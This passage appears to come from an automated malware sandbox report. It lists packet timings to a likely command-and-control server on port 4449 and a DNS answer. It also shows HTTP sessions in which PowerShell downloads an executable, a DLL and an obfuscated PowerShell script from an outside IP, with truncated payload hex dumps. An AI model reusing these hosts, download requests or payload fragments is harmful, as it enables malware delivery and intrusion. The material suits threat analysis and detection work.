Jan 2, 2025 19:15:20.791416883 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:20.791523933 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:20.796310902 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:23.197160959 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:23.201997042 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:23.202089071 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:23.206837893 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:23.498732090 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:23.628695011 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:23.628772974 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:23.630610943 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:23.635351896 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:23.635421991 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:23.640209913 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:30.468365908 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:30.473237991 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:30.473294973 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:30.478065014 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:30.768934965 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:30.871964931 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:30.899121046 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:30.903740883 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:30.908565998 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:30.908621073 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:30.914886951 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:32.728843927 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:32.733669043 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:32.733742952 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:32.738540888 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:32.913317919 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:33.024880886 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:33.047096014 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:33.049149036 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:33.053934097 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:33.054075003 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:33.058804989 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:45.588167906 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:45.592930079 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:45.593031883 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:45.597765923 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:45.906868935 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:46.025068045 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:46.035444975 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:46.037404060 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:46.042174101 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:46.042285919 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:46.047063112 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:52.277462959 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:52.282255888 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:52.282371998 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:52.287187099 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:52.596224070 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:52.723243952 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:52.723336935 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:52.725234985 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:52.729981899 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:15:52.730050087 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:15:52.734822989 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:05.135039091 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:05.141194105 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:05.141259909 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:05.146671057 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:05.275443077 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:05.280200958 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:05.280361891 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:05.285146952 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:05.434526920 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:05.525549889 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:05.569766045 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:05.573880911 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:05.578696012 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:05.579930067 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:05.584728956 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:05.676673889 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:05.680434942 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:05.685194016 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:05.685261965 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:05.689984083 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:16.666951895 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:16.671760082 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:16.671833038 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:16.676630020 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:16.966387033 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:17.114403009 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:17.114540100 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:17.116641998 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:17.121434927 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:17.121542931 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:17.126353979 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:26.838340044 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:26.843277931 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:26.843354940 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:26.848201036 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:27.143368959 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:27.228388071 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:27.271544933 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:27.273341894 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:27.278146029 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:27.278204918 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:27.282958031 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:34.635140896 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:34.640701056 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:34.641805887 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:34.647634029 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:34.952836990 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:34.994096994 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:35.084666967 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:35.089746952 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:35.094475031 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:35.094554901 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:35.099327087 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:41.478948116 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:41.483805895 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:41.483880043 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:41.488625050 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:41.792670012 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:41.837848902 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:41.927469015 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:41.928926945 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:41.933707952 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:41.933773994 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:41.938585043 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:45.011987925 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:45.016927958 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:45.017038107 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:45.021795034 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:45.310719013 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:45.416030884 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:45.443368912 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:45.445312023 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:45.450125933 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:45.450273991 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:45.455055952 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:46.838444948 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:46.843391895 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:46.843482018 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:46.848315001 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:47.160464048 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:47.213023901 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:47.271747112 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:47.275475979 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:47.280292034 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:47.281893015 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:47.286675930 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:55.011926889 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:55.016779900 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:55.016906977 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:55.021668911 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:55.315211058 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:55.431724072 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:55.443489075 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:55.445472002 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:55.450254917 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:55.450439930 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:55.455290079 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:58.497862101 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:58.503472090 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:58.505939960 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:58.510812044 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:58.794035912 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:58.928416967 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:58.931951046 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:59.353665113 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:59.358649969 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:16:59.358737946 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:16:59.363567114 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:17:04.662482977 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:17:04.667373896 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:17:04.667464972 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:17:04.672220945 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:17:04.973792076 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:17:05.025517941 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:17:05.099778891 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:17:05.102587938 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:17:05.107430935 CET	4449	49732	157.20.182.177	192.168.2.4
Jan 2, 2025 19:17:05.107767105 CET	49732	4449	192.168.2.4	157.20.182.177
Jan 2, 2025 19:17:05.112539053 CET	4449	49732	157.20.182.177	192.168.2.4

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 19:13:09.618151903 CET	1.1.1.1	192.168.2.4	0xa11	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 2, 2025 19:13:09.618151903 CET	1.1.1.1	192.168.2.4	0xa11	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

147.45.44.131

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	147.45.44.131	80	7424	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 19:12:58.337635994 CET	275	OUT	GET /infopage/file.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 147.45.44.131 Connection: Keep-Alive
Jan 2, 2025 19:12:59.002113104 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 18:12:58 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 02 Jan 2025 11:05:36 GMT ETag: "325e0-62ab7244bf291" Accept-Ranges: bytes Content-Length: 206304 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ae 14 73 f9 ea 75 1d aa ea 75 1d aa ea 75 1d aa fe 1e 1e ab e2 75 1d aa fe 1e 1c ab fd 75 1d aa ea 75 1c aa ae 77 1d aa fe 1e 18 ab c4 75 1d aa fe 1e 19 ab a5 75 1d aa fe 1e e2 aa eb 75 1d aa fe 1e 1f ab eb 75 1d aa 52 69 63 68 ea 75 1d aa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 9e e4 2e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 14 00 16 02 00 00 f2 00 00 00 00 00 00 a0 f0 01 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 05 00 01 00 00 00 00 00 00 30 03 00 00 04 00 00 26 47 03 00 02 00 40 c1 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$suuuuuuwuuuuRichuPEL.0@0&G@ tH`!TH@@l.textT `.datat0@.idata,@"@@.rsrc`@@@.reloc,@B
Jan 2, 2025 19:12:59.002131939 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: A@@@ApAA`P`pP
Jan 2, 2025 19:12:59.002145052 CET	248	IN	Data Raw: 00 00 60 92 01 00 00 70 92 01 00 00 b0 92 01 00 00 e0 92 01 00 00 50 93 01 00 00 70 93 01 00 00 80 93 01 00 00 20 95 01 00 00 50 95 01 00 00 80 95 01 00 00 b0 95 01 00 00 c0 95 01 00 00 d0 95 01 00 00 10 96 01 00 00 d0 b3 01 00 00 00 b4 01 00 00 Data Ascii: `pPp P 0 `p `P` 0@
Jan 2, 2025 19:12:59.002545118 CET	1236	IN	Data Raw: df 01 00 00 60 df 01 00 00 70 df 01 00 00 90 df 01 00 00 a0 df 01 00 00 b0 df 01 00 00 c0 df 01 00 00 d0 df 01 00 00 e0 df 01 00 00 00 e0 01 00 00 30 e0 01 00 00 40 e0 01 00 00 50 e0 01 00 00 60 e0 01 00 00 70 e0 01 00 00 80 e0 01 00 00 90 e0 01 Data Ascii: `p0@P`p 0@P`p 0@P`p
Jan 2, 2025 19:12:59.002556086 CET	224	IN	Data Raw: a0 df 41 00 b0 b6 40 00 b0 df 41 00 a0 b4 40 00 d0 e0 41 00 c0 df 41 00 d0 df 41 00 e0 df 41 00 30 e0 41 00 40 e0 41 00 50 e0 41 00 60 e0 41 00 70 e0 41 00 80 e0 41 00 90 e0 41 00 a0 e0 41 00 4b 00 65 00 72 00 6e 00 65 00 6c 00 33 00 32 00 2e 00 Data Ascii: A@A@AAAA0A@APA`ApAAAAKernel32.dllHeapSetInformationOleInitialize failed. Could not initialized OLE; OLEVie
Jan 2, 2025 19:12:59.002566099 CET	1236	IN	Data Raw: 77 00 65 00 72 00 20 00 63 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 72 00 75 00 6e 00 2e 00 00 00 43 00 6f 00 75 00 6c 00 64 00 20 00 6e 00 6f 00 74 00 20 00 6c 00 6f 00 61 00 64 00 20 00 62 00 69 00 74 00 6d 00 61 00 70 00 73 00 00 00 00 00 57 00 Data Ascii: wer cannot run.Could not load bitmapsWarning! Certain features of this program may be unavailable to you because you ar
Jan 2, 2025 19:12:59.002577066 CET	24	IN	Data Raw: 78 1f 40 00 43 43 6c 61 73 73 41 63 63 65 73 73 50 72 6f 70 50 61 67 65 Data Ascii: x@CClassAccessPropPage
Jan 2, 2025 19:12:59.002820015 CET	1236	IN	Data Raw: 00 00 00 00 88 a1 40 00 50 e3 41 00 80 c5 40 00 60 b4 40 00 50 b4 40 00 60 b4 40 00 80 de 41 00 90 e2 41 00 a0 de 41 00 b0 de 41 00 c0 de 41 00 d0 de 41 00 e0 de 41 00 b0 e2 41 00 f0 de 41 00 00 df 41 00 10 df 41 00 20 df 41 00 30 df 41 00 40 df Data Ascii: @PA@`@P@`@AAAAAAAAAAA A0A@APA`ApA A0A@APA`ApAAAAAAAA`@@@AA A0A@APApApAAA`A@A@`@P@`@AAAA
Jan 2, 2025 19:12:59.002830029 CET	1236	IN	Data Raw: 66 00 20 00 74 00 68 00 69 00 73 00 20 00 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 2e 00 20 00 41 00 72 00 65 00 20 00 79 00 6f 00 75 00 20 00 73 00 75 00 72 00 65 00 20 00 79 00 6f 00 75 00 20 00 77 00 61 00 6e 00 74 00 Data Ascii: f this application. Are you sure you want to use default permissions?%@@@ @@%@CClassActivationPropPag
Jan 2, 2025 19:12:59.002840042 CET	1236	IN	Data Raw: 00 00 00 00 11 00 00 00 e0 d2 40 00 4e 00 00 00 d9 fd 00 00 9e 00 00 00 9e 00 00 00 26 00 00 00 80 d5 40 00 4e 00 00 00 d8 fd 00 00 9e 00 00 00 9e 00 00 00 26 00 00 00 e0 d5 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @N&@N&@@)@CClassView@0A`@`@P@`@AAAAAAAAAAA A0A@APA`ApA A0A@APA`ApAAAAAAA
Jan 2, 2025 19:12:59.007225990 CET	1236	IN	Data Raw: 43 00 6f 00 6d 00 70 00 6f 00 6e 00 65 00 6e 00 74 00 20 00 43 00 61 00 74 00 65 00 67 00 6f 00 72 00 69 00 65 00 73 00 00 00 00 00 00 00 00 00 41 00 6c 00 6c 00 20 00 48 00 4b 00 45 00 59 00 5f 00 43 00 4c 00 41 00 53 00 53 00 45 00 53 00 5f 00 Data Ascii: Component CategoriesAll HKEY_CLASSES_ROOT\Component Categories EntriesType LibrariesInterfacesDefaultIconLocalS
Jan 2, 2025 19:12:59.414761066 CET	255	OUT	GET /infopage/iviewers.dll HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 147.45.44.131
Jan 2, 2025 19:12:59.597837925 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 18:12:59 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 02 Jan 2025 11:05:39 GMT ETag: "16000-62ab724726645" Accept-Ranges: bytes Content-Length: 90112 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7f 78 25 53 3b 19 4b 00 3b 19 4b 00 3b 19 4b 00 70 61 48 01 31 19 4b 00 70 61 4e 01 a8 19 4b 00 70 61 4f 01 2f 19 4b 00 3d 98 4e 01 24 19 4b 00 3d 98 4f 01 2a 19 4b 00 3d 98 48 01 2f 19 4b 00 70 61 4a 01 38 19 4b 00 3b 19 4a 00 6e 19 4b 00 56 98 42 01 3a 19 4b 00 56 98 4b 01 3a 19 4b 00 56 98 b4 00 3a 19 4b 00 56 98 49 01 3a 19 4b 00 52 69 63 68 3b 19 4b 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 72 76 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 26 00 de 00 00 00 88 00 00 00 00 00 00 63 13 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x%S;K;K;KpaH1KpaNKpaO/K=N$K=O*K=H/KpaJ8K;JnKVB:KVK:KV:KVI:KRich;KPELrvg!&c@JT$K(,>p=@ .text `.rdataab@@.data<`D@.rsrcN@@.reloc,P@B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	147.45.44.131	80	7728	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 19:13:01.453085899 CET	275	OUT	GET /infopage/iubn.ps1 HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 147.45.44.131 Connection: Keep-Alive
Jan 2, 2025 19:13:02.071815014 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 18:13:01 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 02 Jan 2025 11:02:00 GMT ETag: "692-62ab7176e913d" Accept-Ranges: bytes Content-Length: 1682 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 0d 0a 24 78 6e 68 43 58 44 20 3d 20 27 37 49 5a 77 45 41 74 6f 6a 32 79 42 37 6e 71 55 4f 44 63 34 63 73 68 37 6c 54 36 32 71 2b 78 74 7a 49 56 61 75 30 35 70 57 75 67 3d 27 0d 0a 24 73 51 55 56 70 68 20 3d 20 27 69 46 41 69 38 65 6a 46 66 4b 70 67 44 51 38 59 39 59 63 31 6b 67 3d 3d 27 0d 0a 24 78 42 41 4f 4a 36 20 3d 20 27 42 59 59 76 48 54 65 50 7a 37 6a 4b 67 64 4c 5a 5a 69 4a 59 64 42 6a 4d 44 65 70 35 59 48 4a 68 4b 69 31 5a 63 44 36 57 52 48 37 4d 43 43 41 30 76 36 61 38 53 61 6d 4a 62 64 39 39 38 36 77 6b 47 37 57 44 46 5a 31 4c 7a 31 68 2b 6a 4e 66 4e 62 32 4f 63 43 73 50 78 37 61 33 6d 69 4a 50 4a 6e 61 6a 48 43 6c 32 50 72 66 76 68 56 35 2b 67 32 79 6e 4d 2f 4e 33 2b 62 42 6e 75 67 5a 74 51 57 71 54 39 69 47 4b 45 45 79 42 59 46 52 48 76 4d 4e 75 45 65 49 53 73 73 4b 39 50 35 50 75 54 71 58 6e 47 53 4a 41 59 35 53 4b 74 75 42 72 33 62 49 47 72 58 67 76 62 44 36 34 33 38 47 2f 52 69 4c 76 41 56 62 74 75 62 42 67 2b 41 6a 55 6a 50 50 71 52 6f 68 65 71 64 33 52 57 64 41 64 30 46 75 77 36 74 [TRUNCATED] Data Ascii: $xnhCXD = '7IZwEAtoj2yB7nqUODc4csh7lT62q+xtzIVau05pWug='$sQUVph = 'iFAi8ejFfKpgDQ8Y9Yc1kg=='$xBAOJ6 = 